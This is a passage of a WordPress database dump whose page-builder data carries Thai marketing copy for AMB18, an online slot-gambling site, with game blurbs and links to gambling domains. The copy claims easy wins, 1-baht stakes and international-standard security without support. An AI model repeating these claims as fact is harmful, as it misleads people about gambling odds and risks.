\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2878,390,'_thumbnail_id','371'),(2879,390,'_elementor_edit_mode','builder'),(2880,390,'_elementor_template_type','wp-page'),(2881,390,'_elementor_version','3.35.5'),(2882,390,'_elementor_pro_version','3.32.3'),(2883,390,'_wp_page_template','default'),(2884,390,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2885,390,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 